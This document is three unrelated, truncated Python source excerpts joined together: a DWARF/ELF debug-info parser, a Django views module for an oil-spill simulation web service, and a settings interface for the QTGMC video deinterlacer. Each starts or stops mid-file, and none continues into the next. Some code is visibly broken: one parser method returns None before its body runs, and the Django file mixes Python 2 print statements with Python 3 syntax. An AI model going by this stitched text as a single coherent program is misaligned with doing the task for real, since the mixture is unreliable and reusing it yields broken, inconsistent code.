|DW_AT_byte_size : AttributeValue(name='DW_AT_byte_size', form='DW_FORM_data1', value=1, raw_value=1, offset=90166)
|DW_AT_decl_column : AttributeValue(name='DW_AT_decl_column', form='DW_FORM_data1', value=6, raw_value=6, offset=90167)
|DW_AT_decl_file : AttributeValue(name='DW_AT_decl_file', form='DW_FORM_data1', value=1, raw_value=1, offset=90168)
|DW_AT_decl_line : AttributeValue(name='DW_AT_decl_line', form='DW_FORM_data1', value=68, raw_value=68, offset=90169)
)
gcc 7.2.1 x86_64
typedef enum {
DOWN=0,
UP=-1
} direction_t;
([DIE DW_TAG_typedef, size=11, has_children=False
|DW_AT_name : AttributeValue(name='DW_AT_name', form='DW_FORM_strp', value=b'direction_t', raw_value=3522, offset=7737)
|DW_AT_decl_file : AttributeValue(name='DW_AT_decl_file', form='DW_FORM_data1', value=1, raw_value=1, offset=7741)
|DW_AT_decl_line : AttributeValue(name='DW_AT_decl_line', form='DW_FORM_data1', value=199, raw_value=199, offset=7742)
|DW_AT_type : AttributeValue(name='DW_AT_type', form='DW_FORM_ref4', value=2087, raw_value=2087, offset=7743)
, DIE DW_TAG_enumeration_type, size=13, has_children=True
|DW_AT_encoding : AttributeValue(name='DW_AT_encoding', form='DW_FORM_data1', value=7, raw_value=7, offset=7712)
|DW_AT_byte_size : AttributeValue(name='DW_AT_byte_size', form='DW_FORM_data1', value=4, raw_value=4, offset=7713)
|DW_AT_type : AttributeValue(name='DW_AT_type', form='DW_FORM_ref4', value=51, raw_value=51, offset=7714)
|DW_AT_decl_file : AttributeValue(name='DW_AT_decl_file', form='DW_FORM_data1', value=1, raw_value=1, offset=7718)
|DW_AT_decl_line : AttributeValue(name='DW_AT_decl_line', form='DW_FORM_data1', value=196, raw_value=196, offset=7719)
|DW_AT_sibling : AttributeValue(name='DW_AT_sibling', form='DW_FORM_ref4', value=2112, raw_value=2112, offset=7720)
], DIE DW_TAG_base_type, size=7, has_children=False
|DW_AT_byte_size : AttributeValue(name='DW_AT_byte_size', form='DW_FORM_data1', value=4, raw_value=4, offset=5676)
|DW_AT_encoding : AttributeValue(name='DW_AT_encoding', form='DW_FORM_data1', value=7, raw_value=7, offset=5677)
|DW_AT_name : AttributeValue(name='DW_AT_name', form='DW_FORM_strp', value=b'unsigned int', raw_value=142, offset=5678)
)
"""
import sys
import logging
import struct
from functools import reduce
from itertools import chain
from elftools.elf.elffile import ELFFile
from elftools.elf.sections import SymbolTableSection, Symbol
try:
# pyelftools 0.24
from elftools.dwarf.structs import _ULEB128
except ImportError:
# pyelftools 0.27
from elftools.common.construct_utils import ULEB128 as _ULEB128
from elftools.dwarf.die import AttributeValue, DIE
from typing import Any, Dict, Iterator, List, Optional, Tuple, Union, Generator
logger = logging.getLogger('dwarf')
uleb128 = _ULEB128('dummy')
class FileParser:
def __init__(self, filename: str) -> None:
self.all_dies = {}
self.elf_file = None
self.symbol_table = None
f = open(filename, 'rb')
logger.debug('Processing file: {}'.format(filename))
self.elf_file = ELFFile(f)
self.read_dies_from_dwarf_file()
# the following assumes there's just one symbol table (ELF format allows more than one):
self.symbol_tables = [x for x in self.elf_file.iter_sections() if isinstance(x, SymbolTableSection)]
self.symbol_table = {x.name: x for x in chain(*[s.iter_symbols() for s in self.symbol_tables])}
var_dies = {offset: die for offset, die in self.all_dies.items() if die.tag == 'DW_TAG_variable' and 'DW_AT_type' in die.attributes}
logger.debug("read %d DIEs which include %d variable DIEs" % (len(self.all_dies), len(var_dies)))
self.var_descriptors = var_descriptors = []
for offset, var_die in var_dies.items():
var_descriptors.append(VarDescriptor(self, self.all_dies, var_die, None))
self.interesting_vars = [v for v in var_descriptors if v.is_interesting()]
# note the file is intentionally kept open, otherwise some functions would fail later
def read_dies_from_dwarf_file(self) -> None:
if not self.elf_file.has_dwarf_info():
logger.error('file has no DWARF info')
return
dwarfinfo = self.elf_file.get_dwarf_info()
for CU in dwarfinfo.iter_CUs():
top_DIE = CU.get_top_DIE()
self.read_die_rec(top_DIE)
def read_die_rec(self, die: DIE) -> None:
self.all_dies[die.offset] = die
for child in die.iter_children():
self.read_die_rec(child)
def visit_interesting_vars_tree_leafs(self) -> Generator['VarDescriptor', None, None]:
for v in self.interesting_vars:
yield from v.visit_leafs()
def pretty_print(self, children=None, tab=0):
if children is None:
children = self.interesting_vars
for v in children:
print("{}{!s}".format(' ' * tab, v))
self.pretty_print(children=v.children, tab=tab + 1)
def read_value_at_address(self, address, size, section_name='st_shndx'):
"""
"""
return None
section_num = symbol.entry[section_name]
section = self.elf_file.get_section(section_num)
section_start_addr = section['sh_addr']
return section.data()[address - section_start_addr : address - section_start_addr + size]
def get_value_by_name(self, name, var_descriptor=None):
if self.symbol_table is None:
return None # TODO more meaningful error return values?
if name not in self.symbol_table:
return None
symbol = self.symbol_table[name]
if symbol is None:
return None # TODO more meaningful error return values?
if not isinstance(symbol, Symbol):
symbol = symbol[0]
section_num = symbol.entry['st_shndx']
if not isinstance(section_num, int): # several special cases are possible
if section_num == 'SHN_ABS': # special case, means symbol['st_value'] isn't an address but an actual value
return symbol['st_value']
else: # other special cases are not implemented
return None # TODO more meaningful error return values?
address = symbol['st_value']
# size = symbol['st_size'] # NOT GOOD, rounded to multiple of 4 or something.
# have to look up size in DWARF data (var_descriptor):
if var_descriptor is None: # hack - mixed use cases. should fix
var_descriptor = [x for x in self.var_descriptors if x.name == name]
if var_descriptor is None or len(var_descriptor) > 1:
return None # TODO more meaningful error return values?
var_descriptor = var_descriptor[0]
size = var_descriptor.size
if size is None:
return None # TODO more meaningful error return values?
section = self.elf_file.get_section(section_num)
section_start_addr = section['sh_addr']
return section.data()[address - section_start_addr : address - section_start_addr + size]
DW_OP_plus_uconst = 0x23 # Page 20
DW_OP_addr = 0x3 # Page 14
class DwarfTypeMissingRequiredAttribute(Exception):
def __init__(self, var, name):
self.var = var
self.name = name
super().__init__('DWARF var {var_name} missing attribute {name}'.format(var_name=var.name, name=name))
int_unpack_from_size = {
k: lambda v, s=s: struct.unpack('<' + s, v)[0]
for k, s in {
8: 'q',
4: 'l',
2: 'h',
1: 'b'
}.items()
}
class VarDescriptor:
uninteresting_var_names = ['main_func_sp', 'g_pfnVectors']
DW_TAG_class_type = 'DW_TAG_class_type'
DW_TAG_const_type = 'DW_TAG_const_type'
DW_TAG_volatile_type = 'DW_TAG_volatile_type'
DW_TAG_pointer_type = 'DW_TAG_pointer_type'
DW_TAG_array_type = 'DW_TAG_array_type'
DW_TAG_subrange_type = 'DW_TAG_subrange_type'
DW_TAG_enumeration_type = 'DW_TAG_enumeration_type'
DW_TAG_typedef = 'DW_TAG_typedef'
type_tags_to_names = {DW_TAG_class_type: 'class',
DW_TAG_const_type: 'const',
DW_TAG_volatile_type: 'volatile',
DW_TAG_pointer_type: 'pointer to',
DW_TAG_array_type: 'array of',
DW_TAG_typedef: 'typedef'}
DW_AT_name = 'DW_AT_name'
DW_AT_type = 'DW_AT_type'
DW_AT_external = 'DW_AT_external'
DW_AT_location = 'DW_AT_location'
DW_AT_decl_line = 'DW_AT_decl_line'
DW_AT_byte_size = 'DW_AT_byte_size'
DW_AT_upper_bound = 'DW_AT_upper_bound'
DW_AT_data_member_location = 'DW_AT_data_member_location'
ADDRESS_TYPE_UNSUPPORTED = '(Address Type Unsupported)'
def __init__(self, parser: FileParser, all_dies: Dict[int, DIE], var_die: DIE, parent: None) -> None:
self.parser = parser
self.parent = parent
self.all_dies = all_dies
self.var_die = var_die
die_name = self.get_attribute_value(self.DW_AT_name, required=False)
self.name = die_name.decode('utf-8') if die_name is not None else None
self.address = self.parse_location()
self.type = self.get_type_die(var_die)
self.size = self._get_size()
# look for default value
init_value = self.parser.get_value_by_name(self.name, self)
if init_value is not None and \
not isinstance(init_value, int) and \
len(init_value) > 0 and \
self.size in int_unpack_from_size:
self.init_value = int_unpack_from_size[self.size](init_value)
else:
self.init_value = init_value
if not self.is_pointer():
self.children = self._create_children()
else:
self.children = []
def parse_location(self) -> Union[str, int]:
# TODO: handle address parsing better and for more cases (using an interface for processing DWARF expressions?)
ret = self._parse_member_location()
if ret is None:
ret = self._parse_location_attribute()
if ret is None:
# in some cases DWARF doesn't have address info but the symbol table does,
# for example singletons that are referenced through extern declaration in other files
if self.name in self.parser.symbol_table:
ret = self.parser.symbol_table[self.name].entry['st_value']
else:
ret = "(No Address)"
return ret
def _parse_member_location(self) -> None:
attr = self.get_attribute(self.DW_AT_data_member_location)
if attr is None:
return None
assert self.parent is not None
if attr.form == 'DW_FORM_block1':
opcode = attr.value[0]
if opcode != DW_OP_plus_uconst:
return self.ADDRESS_TYPE_UNSUPPORTED
offset = uleb128.parse(bytes(attr.value[1:]))
elif attr.form in ['DW_FORM_data1', 'DW_FORM_data2', 'DW_FORM_data4']:
offset = attr.value
else:
return self.ADDRESS_TYPE_UNSUPPORTED
if not isinstance(self.parent.address, int):
return self.ADDRESS_TYPE_UNSUPPORTED
return self.parent.address + offset
def _parse_location_attribute(self) -> Union[str, int]:
loc = self.get_attribute(self.DW_AT_location)
if loc is None:
return None
if loc.form == 'DW_FORM_exprloc':
return self._parse_address_exprloc(loc)
elif loc.form == 'DW_FORM_block1':
return self._parse_address_block1(loc)
return self.ADDRESS_TYPE_UNSUPPORTED
def _parse_address_exprloc(self, loc: AttributeValue) -> Union[str, int]:
# TODO right now only supporting exprloc of the same format as block1:
return self._parse_address_block1(loc)
def _parse_address_block1(self, loc: AttributeValue) -> Union[str, int]:
opcode = loc.value[0]
if len(loc.value) == 9 and opcode == DW_OP_addr: # seen with amd64 compilation of static variables
# should use host endianess
return struct.unpack('<q', struct.pack('bbbbbbbb', *loc.value[1:]))[0]
if len(loc.value) != 5 or opcode != DW_OP_addr:
return self.ADDRESS_TYPE_UNSUPPORTED
a, b, c, d = loc.value[1:]
return a + (b << 8) + (c << 16) + (d << 24)
def _die_at_attr(self, die: DIE, attr_name: str) -> DIE:
attr = die.attributes[attr_name]
if attr.form == 'DW_FORM_ref_addr':
die_offset = attr.value # store offset is absolute offset in the DWARF info
elif attr.form == 'DW_FORM_ref4':
die_offset = attr.value + die.cu.cu_offset # Stored offset is relative to the current Compilation Unit
else:
return ("Unsupported form of the type attribute: %s" % attr.form)
return self.all_dies[die_offset]
def get_type_die(self, die: DIE) -> DIE:
if 'DW_AT_type' not in die.attributes:
return "No type die"
type_die = self._die_at_attr(die, self.DW_AT_type)
return type_die
def is_interesting(self) -> bool:
# TODO: better criteria than the address?
return (
isinstance(self.address, int) # either an address was not specified or is not a fixed address in RAM (local var, const in flash memory, etc)
and not self.name.startswith('_') # various system variables
and not self.name.startswith('$') # not sure when these pop up but they are not interesting
and not self.name in VarDescriptor.uninteresting_var_names)
def get_die_tags(self) -> List[str]:
type_chain, last_type = self.visit_type_chain()
type_chain.append(last_type)
| |
<filename>hcmr_pilot/views.py<gh_stars>1-10
import csv
import sys
import json
from django.core.exceptions import PermissionDenied
from django.template.loader import render_to_string
import folium
from folium import plugins
import numpy as np
from PIL import Image, ImageChops
from bs4 import BeautifulSoup
import requests
from django.http import HttpResponseRedirect, HttpResponse, JsonResponse
from django.shortcuts import render, redirect
import time
from pandas import DataFrame
from .forms import HCMRForm
import calculate_red_points as red_points_calc
from django.conf import settings
from access_controller.policy_enforcement_point import PEP
from service_builder.models import Service, ServiceInstance
from threading import Thread
from datetime import datetime
from query_designer.models import AbstractQuery
import prestodb
import psycopg2
import requests
import time
from datetime import datetime, timedelta
def trim(img):
border = Image.new(img.mode, img.size, img.getpixel((0, 0)))
diff = ImageChops.difference(img, border)
diff = ImageChops.add(diff, diff, 2.0, -100)
bbox = diff.getbbox()
if bbox:
img = img.crop(bbox)
return np.array(img)
def check_access(request, service):
access_decision = PEP.access_to_service(request, service.id)
if access_decision is False:
raise PermissionDenied
def create_map():
tiles_str = 'https://api.mapbox.com/v4/mapbox.satellite/{z}/{x}/{y}.png?access_token='
token_str = '<KEY>'
attr_str = 'Map data ©<a href="http://openstreetmap.org">OpenStreetMap</a>contributors, ' + '<a href="http://creativecommons.org/licenses/by-sa/2.0/">CC-BY-SA</a>, ' + 'Imagery \u00A9 <a href="http://mapbox.com">Mapbox</a>'
location = [38.41, 21.97]
zoom_start = 5
max_zoom = 30
min_zoom = 2
m = folium.Map(location=location,
zoom_start=zoom_start,
max_zoom=max_zoom,
min_zoom=min_zoom,
max_bounds=True,
tiles=tiles_str + token_str,
attr=attr_str)
plugins.Fullscreen(
position='topright',
title='Expand me',
title_cancel='Exit me',
force_separate_button=True).add_to(m)
return m
from website_analytics.views import *
def init(request):
form = HCMRForm()
scenario = request.GET['scenario']
print scenario
execution_steps = dict()
execution_steps['OIL_SPILL_SCENARIO_1'] = ["starting service", "Creating simulation request",
"Simulation running", "Simulation results received",
"Transforming data to be shown on map",
"Calculating oil spill intersections with protected areas", "done"]
execution_steps['OIL_SPILL_SCENARIO_2'] = ["starting service", "Creating simulation request",
"Simulation running", "Simulation results received",
"Transforming data to be shown on map",
"Calculating oil spill intersections with protected areas", "done"]
execution_steps['OIL_SPILL_SCENARIO_3'] = ["starting service", "Creating simulation request",
"Simulation running", "Simulation results received",
"Transforming data to be shown on map",
"Calculating oil spill intersections with protected areas", "done"]
list = []
for i in range(0, 61):
list.append(i*12)
list.pop(0)
m = create_map()
if int(scenario) == 2:
data_img = Image.open('visualizer/static/visualizer/img/ais_density_maps/ais_data_photo_med.png')
data = trim(data_img)
data_img.close()
# Overlay the image
density_map_layer = plugins.ImageOverlay(data, zindex=1, opacity=0.5, mercator_project=True,
bounds=[[30.13, -5.941], [45.86, 36.42]])
density_map_layer.layer_name = 'AIS Density Map'
m.add_child(density_map_layer)
folium.LayerControl().add_to(m)
temp_map = 'templates/map1' + str(int(time.time())) + '.html'
m.save(temp_map)
map_html = open(temp_map, 'r').read()
soup = BeautifulSoup(map_html, 'html.parser')
map_id = soup.find("div", {"class": "folium-map"}).get('id')
js_all = soup.findAll('script')
# print(js_all)
if len(js_all) > 5:
js_all = [js.prettify() for js in js_all[5:]]
css_all = soup.findAll('link')
if len(css_all) > 3:
css_all = [css.prettify() for css in css_all[3:]]
print map_id
return render(request, 'hcmr_pilot/load_service.html', {'form': form, 'scenario': scenario, 'execution_steps': execution_steps, 'sim_len_list': list, 'map_id': map_id, 'js_all': js_all, 'css_all': css_all})
def scenario1_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
visualization_url = service_exec.dataframe_visualizations['v1']
filename_output = service_exec.arguments['algorithm-arguments'][0]['out_filepath']
location_lat = float(service_exec.arguments['algorithm-arguments'][0]['latitude'])
location_lon = float(service_exec.arguments['algorithm-arguments'][0]['longitude'])
start_date = service_exec.arguments['algorithm-arguments'][0]['start_date']
oil_volume = service_exec.arguments['algorithm-arguments'][0]['oil_volume']
wave_forecast_dataset = service_exec.arguments['algorithm-arguments'][0]['wave_model']
hydrodynamic_model = service_exec.arguments['algorithm-arguments'][0]['ocean_model']
sim_length = service_exec.arguments['algorithm-arguments'][0]['sim_length']
spill_data = service_exec.arguments['algorithm-arguments'][1]['spill_data']
headers_spill = service_exec.arguments['algorithm-arguments'][1]['headers_spill']
legend_data = [{"timestamp": d[0],"time": d[0], "init_vol": oil_volume, "evap_vol": d[2], "emul_vol": d[4],
"vol_on_surface": d[3], "vol_on_coasts": d[6], } for d in spill_data]
# import sys
# for d in legend_data:
# if sys.argv[1] != 'runserver':
# d_mod = datetime.strptime(d['timestamp'], "%Y-%m-%d %H:%M:%S") - timedelta(hours=2)
# d['timestamp'] = long(time.mktime(d_mod.timetuple()) * 1000)
# d['time'] = str(d_mod)
# else:
# d_mod = datetime.strptime(d['timestamp'], "%Y-%m-%d %H:%M:%S")
# d['timestamp'] = long(time.mktime(d_mod.timetuple()) * 1000)
# d['time'] = str(d_mod - timedelta(hours=2))
import pytz
for d in legend_data:
d_mod = datetime.strptime(d['timestamp'], "%Y-%m-%d %H:%M:%S")
d['timestamp'] = long(
(d_mod.replace(tzinfo=pytz.utc) - datetime(1970, 1, 1, tzinfo=pytz.utc)).total_seconds() * 1000)
d['time'] = str(d_mod)
context = {
'url': visualization_url,
'out_filepath': filename_output,
'legend_data': legend_data,
'result': [],
'service_title': 'Oil Spill Dispersion Forecast Acquisition',
'back_url': '/oilspill/?scenario=1',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):', 'value': '(' + str(round(location_lat, 3)) + ', ' + str(round(location_lon,3)) + ')'},
{'icon': 'far fa-calendar-alt', 'text': 'Date and Time:', 'value': str(start_date)},
# {'icon': 'fas fa-flask', 'text': 'Oil Volume:', 'value': str(oil_volume) + ' m3'},
{'icon': 'far fa-clock', 'text': 'Simulation Length', 'value': str(sim_length) + ' hours'},
{'icon': 'fas fa-database', 'text': 'Ocean Circulation Model:', 'value': str(hydrodynamic_model)},
{'icon': 'fas fa-box', 'text': 'Wave Model:', 'value': str(wave_forecast_dataset)}],
}
return render(request, 'hcmr_pilot/scenario1-results.html', context)
def scenario2_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
visualization_url = service_exec.dataframe_visualizations['v1']
filename_output = service_exec.arguments['algorithm-arguments'][0]['out_filepath']
list_of_points = []
alg_arguments = service_exec.arguments['algorithm-arguments'][0]
for i in range(1, alg_arguments['number_of_points']+1):
list_of_points.append((round(float(alg_arguments['latitude' + str(i)]), 3), (round(float(alg_arguments['longitude' + str(i)]), 3))))
start_date = service_exec.arguments['algorithm-arguments'][0]['start_date']
oil_volume = str(int(alg_arguments['number_of_points'])*int(service_exec.arguments['algorithm-arguments'][0]['oil_volume']))
wave_forecast_dataset = service_exec.arguments['algorithm-arguments'][0]['wave_model']
hydrodynamic_model = service_exec.arguments['algorithm-arguments'][0]['ocean_model']
sim_length = service_exec.arguments['algorithm-arguments'][0]['sim_length']
spill_data = service_exec.arguments['algorithm-arguments'][1]['spill_data']
headers_spill = service_exec.arguments['algorithm-arguments'][1]['headers_spill']
legend_data = [{"timestamp": d[0],
"time": d[0], "init_vol": oil_volume, "evap_vol": d[2], "emul_vol": d[4],
"vol_on_surface": d[3], "vol_on_coasts": d[6], } for d in spill_data]
# import sys
# for d in legend_data:
# if sys.argv[1] != 'runserver':
# d_mod = datetime.strptime(d['timestamp'], "%Y-%m-%d %H:%M:%S") - timedelta(hours=2)
# d['timestamp'] = long(time.mktime(d_mod.timetuple()) * 1000)
# d['time'] = str(d_mod)
# else:
# d_mod = datetime.strptime(d['timestamp'], "%Y-%m-%d %H:%M:%S")
# d['timestamp'] = long(time.mktime(d_mod.timetuple()) * 1000)
# d['time'] = str(d_mod - timedelta(hours=2))
import pytz
for d in legend_data:
d_mod = datetime.strptime(d['timestamp'], "%Y-%m-%d %H:%M:%S")
d['timestamp'] = long(
(d_mod.replace(tzinfo=pytz.utc) - datetime(1970, 1, 1, tzinfo=pytz.utc)).total_seconds() * 1000)
d['time'] = str(d_mod)
context = {
'url': visualization_url,
'out_filepath': filename_output,
'legend_data': legend_data,
'result': [],
'service_title': 'High Risk Pollution Areas',
'back_url': '/oilspill/?scenario=2',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):',
'value': str(list_of_points)},
{'icon': 'far fa-calendar-alt', 'text': 'Date and Time:', 'value': str(start_date)},
# {'icon': 'fas fa-flask', 'text': 'Oil Volume:', 'value': str(oil_volume) + ' m3'},
{'icon': 'far fa-clock', 'text': 'Simulation Length', 'value': str(sim_length) + ' hours'},
{'icon': 'fas fa-database', 'text': 'Ocean Circulation Model:', 'value': str(hydrodynamic_model)},
{'icon': 'fas fa-box', 'text': 'Wave Model:', 'value': str(wave_forecast_dataset)}],
}
return render(request, 'hcmr_pilot/scenario1-results.html', context)
def scenario3_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
visualization_url = service_exec.dataframe_visualizations['v1']
filename_output = service_exec.arguments['algorithm-arguments'][0]['out_filepath']
location_lat = float(service_exec.arguments['algorithm-arguments'][0]['latitude'])
location_lon = float(service_exec.arguments['algorithm-arguments'][0]['longitude'])
location_dep = float(service_exec.arguments['algorithm-arguments'][0]['depth'])
start_date = service_exec.arguments['algorithm-arguments'][0]['start_date']
oil_volume = service_exec.arguments['algorithm-arguments'][0]['oil_volume']
wave_forecast_dataset = service_exec.arguments['algorithm-arguments'][0]['wave_model']
hydrodynamic_model = service_exec.arguments['algorithm-arguments'][0]['ocean_model']
sim_length = service_exec.arguments['algorithm-arguments'][0]['sim_length']
spill_data = service_exec.arguments['algorithm-arguments'][1]['spill_data']
headers_spill = service_exec.arguments['algorithm-arguments'][1]['headers_spill']
legend_data = [{"timestamp": d[0],
"time": d[0], "init_vol": oil_volume, "evap_vol": d[2], "emul_vol": d[4],
"vol_on_surface": d[3], "vol_on_coasts": d[6], } for d in spill_data]
# import sys
# for d in legend_data:
# if sys.argv[1] != 'runserver':
# d_mod = datetime.strptime(d['timestamp'], "%Y-%m-%d %H:%M:%S") - timedelta(hours=2)
# d['timestamp'] = long(time.mktime(d_mod.timetuple()) * 1000)
# d['time'] = str(d_mod)
# else:
# d_mod = datetime.strptime(d['timestamp'], "%Y-%m-%d %H:%M:%S")
# d['timestamp'] = long(time.mktime(d_mod.timetuple()) * 1000)
# d['time'] = str(d_mod - timedelta(hours=2))
import pytz
for d in legend_data:
d_mod = datetime.strptime(d['timestamp'], "%Y-%m-%d %H:%M:%S")
d['timestamp'] = long(
(d_mod.replace(tzinfo=pytz.utc) - datetime(1970, 1, 1, tzinfo=pytz.utc)).total_seconds() * 1000)
d['time'] = str(d_mod)
output_json = filename_output.replace('_F.out', '.json')
depth_data = extract_depth_data(str(output_json))
context = {
'start_lat': round(location_lat, 3),
'start_lon': round(location_lon, 3),
'start_depth': round(location_dep, 3),
'depth_data': depth_data,
'url': visualization_url,
'out_filepath': filename_output,
'legend_data': legend_data,
'result': [],
'service_title': 'Underwater Accident',
'back_url': '/oilspill/?scenario=3',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude, depth):',
'value': '(' + str(round(location_lat, 3)) + ', ' + str(round(location_lon, 3)) + ', ' + str(round(location_dep, 3))+')'},
{'icon': 'far fa-calendar-alt', 'text': 'Date and Time:', 'value': str(start_date)},
# {'icon': 'fas fa-flask', 'text': 'Oil Volume:', 'value': str(oil_volume) + ' m3'},
{'icon': 'far fa-clock', 'text': 'Simulation Length', 'value': str(sim_length) + ' hours'},
{'icon': 'fas fa-database', 'text': 'Ocean Circulation Model:', 'value': str(hydrodynamic_model)},
{'icon': 'fas fa-box', 'text': 'Wave Model:', 'value': str(wave_forecast_dataset)}],
}
return render(request, 'hcmr_pilot/scenario3-results.html', context)
def index(request):
if request.method == 'GET':
form = HCMRForm(request.GET)
if form.is_valid():
return HttpResponseRedirect('/process/')
else:
form = HCMRForm()
return render(request, 'hcmr_pilot/config-service-form-fields.html', {'form': form})
def execute(request):
scenario = str(request.GET.get('scenario'))
if scenario == '1':
service = Service.objects.get(pk=settings.OIL_SPILL_FORECAST_SERVICE_ID)
if scenario == '2':
service = Service.objects.get(pk=settings.HIGH_RISK_POLLUTION_SERVICE_ID)
if scenario == '3':
service = Service.objects.get(pk=settings.UNDERWATER_ACCIDENT_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
# Spawn thread to process the data
t = Thread(target=process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
def process(request, exec_instance):
dataset_list = []
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
try:
service_exec.arguments = {"filter-arguments": [], "algorithm-arguments": [{}, {}]}
spill_infos, wave_model, ocean_model, natura_layer, ais_layer, time_interval, sim_length, oil_density, \
valid_points, valid_points_count, scenario, start_date, latitude, longitude, contours_layer, contours_var = \
parse_request_params(request)
depth = 0
if (scenario == '1') or (scenario == '3'):
service_exec.arguments["algorithm-arguments"][0]["latitude"] = spill_infos[0]['latitude']
service_exec.arguments["algorithm-arguments"][0]["longitude"] = spill_infos[0]['longitude']
if scenario == '3':
cursor_presto = get_presto_cursor()
resolution = 1
if wave_model == '202':
query = "SELECT * FROM (SELECT min(depth) FROM hcmr_poseidon_aeg_bathymetry WHERE round(latitude," + str(resolution) +" )=" + str(round(
float(spill_infos[0]['latitude']), resolution)) + " AND round(longitude," + str(resolution) + ")=" + str(round(
float(spill_infos[0]['longitude']),resolution)) + ")"
cursor_presto.execute(query)
try:
dataset_list.append((Dataset.objects.get(table_name='hcmr_poseidon_aeg_bathymetry')).id)
except:
print 'Dataset does not exist in database'
else:
query = "SELECT * FROM (SELECT min(depth) FROM hcmr_poseidon_med_bathymetry | |
<filename>qtgmc_modern/settings/_interface.py<gh_stars>1-10
"""
Implements the interface in static typing and at runtime plus some enumerations.
"""
__all__ = [
'CoreParam', 'CoreSettings',
'VSCallableD',
'InterpolationSettings',
'MotionAnalysisSettings',
'SharpnessSettings',
'SourceMatchSettings',
'NoiseSettings',
'MotionBlurSettings',
'Settings',
'SearchPre', 'SubPel', 'SubPelInter', 'Search', 'PLevel',
'InputType'
]
from enum import IntEnum
from typing import TYPE_CHECKING, Any, Dict, Optional, TypedDict
from ._abstract import LoggedSettings
if TYPE_CHECKING:
# Features / Settings dicts
class VSCallableD(TypedDict):
"""
VapourSynth Callable Deinterlacer.\n
Must map a Deinterlacer.
"""
name: str
"""
Deinterlacer name. Must map a name in /filers/_conv/DEINTERLACERS
"""
args: Optional[Dict[str, Any]]
"""
Additional keywords arguments
"""
class CoreParam(TypedDict):
"""
Couple of Temporal Radius and Repair values
"""
tr: int
"""
Temporal binomial/linear smoothing radius used.
"""
rep: int
"""
Repair value (0=off)
"""
class CoreSettings(TypedDict):
"""
Main core settings for motion analysis
"""
motion_search: CoreParam
"""
Made of a temporal binomial smoothing radius used to create motion search clip
and a repair motion search value.\n
Old "TR0" and "Rep0".
"""
initial_output: CoreParam
"""
Made of a temporal binomial smoothing radius used on interpolated clip
for inital output and a repair initial output value.\n
Old "TR1" and "Rep1".
"""
final_output: CoreParam
"""
Made of a temporal linear smoothing radius used
for final stablization / denoising and a repair final output value.\n
Old "TR2" and "Rep2".
"""
class InterpolationSettings(TypedDict):
"""
Interpolation settings
"""
deint: VSCallableD
"""
Main deinterlacer.\n
Supported string names are in /filers/_conv/DEINTERLACERS are supported.
Old "EdiMode" ("NNSize", "NNeurons", "EdiQual", "EdiMaxD", "EdiThreads").
"""
deint_chroma: Optional[VSCallableD]
"""
Optional deinterlacer for chroma planes.\n
Supported string names are in /filers/_conv/DEINTERLACERS are supported.
Old "ChromaEdi".
"""
ref: Optional[bool]
"""
Boolean used to check if a reference clip has been passed to the main class QTGMC.
Old "EdiExt", kinda.
"""
class MotionAnalysisSettings(TypedDict):
"""
Motion analysis settings used in mvtools
"""
searchpre: int
"""
Pre-filtering for motion search clip. See `SearchPre`.
Old "SrchClipPP".
"""
subpel: int
"""
Sub-pixel accuracy for motion analysis. See `SubPel`.
Old "SubPel".
"""
subpel_inter: int
"""
Interpolation used for sub-pixel motion analysis. See `SubPelInter`
Old "SubPelInterp".
"""
blocksize: int
"""
Size of blocks that are matched during motion analysis.
Old "Blocksize".
"""
overlap: int
"""
How much to overlap motion analysis blocks
(requires more blocks, but essential to smooth block edges in motion compenstion)
Old "Overlap".
"""
search: int
"""
Search method used for matching motion blocks - see MVTools2 documentation for available algorithms.
See `Search`.
Old "Search".
"""
search_param: int
"""
Parameter for search method chosen. See `Search`.
Old "SearchParam".
"""
pelsearch: int
"""
Search parameter (as above) for the finest sub-pixel level. See `SubPel`.
Old "PelSearch".
"""
chroma_motion: bool
"""
Whether to consider chroma when analyzing motion.
Setting to false gives good speed-up, but may very occasionally make incorrect motion decision.
Old "ChromaMotion".
"""
truemotion: bool
"""
Whether to use the 'truemotion' defaults from MAnalyse
Old "TrueMotion".
"""
lambda_: Optional[int]
"""
Motion vector field coherence - how much the motion analysis favors similar motion vectors
for neighboring blocks. Should be scaled by blocksize * blocksize / 64.
Old "Lambda".
"""
lsad: Optional[int]
"""
How much to reduce need for vector coherence (i.e. lambda_ above) if prediction of motion vector
from neighbors is poor, typically in areas of complex motion.
This value is scaled in MVTools (unlike lambda_).
Old "LSAD".
"""
pnew: Optional[int]
"""
Penalty for choosing a new motion vector for a block over an existing one -
avoids chosing new vectors for minor gain.
Old "PNew".
"""
plevel: Optional[int]
"""
Mode for scaling lambda across different sub-pixel levels - see MVTools2 documentation for choices.
See `PLevel`.
Old "PLevel".
"""
globalmotion: bool
"""
Whether to estimate camera motion to assist in selecting block motion vectors.
Old "GlobalMotion".
"""
dct: int
"""
Modes to use DCT (frequency analysis) or SATD as part of the block matching process -
see MVTools2 documentation for choices.
Old "DCT".
"""
thsad_initial_output: int
"""
SAD threshold for block match on shimmer-removing temporal smooth (initial_output tr).
Increase to reduce bob-shimmer more (may smear/blur).
Old "ThSAD1".
"""
thsad_final_output: int
"""
SAD threshold for block match on final denoising temporal smooth (final_output tr).
Increase to strengthen final smooth (may smear/blur).
Old "ThSAD2".
"""
thscd1: int
"""
Scene change detection parameter 1 - see MVTools documentation.
Old "ThSCD1".
"""
thscd2: int
"""
Scene change detection parameter 2 - see MVTools documentation.
Old "ThSCD2".
"""
prog_sad_mask: float
"""
Only applies to InputType=2 or 3.
If prog_sad_mask > 0.0 then blend InputType modes 1 and 2/3 based on block motion SAD.
Higher values help recover more detail, but repair less artefacts.
Reasonable range about 2.0 to 20.0, or 0.0 for no blending.
Old "ProgSADMask".
"""
class SharpnessSettings(TypedDict):
"""Sharp"""
strength: float
"""
How much to resharpen the temporally blurred clip.
Old "Sharpness".
"""
mode: int
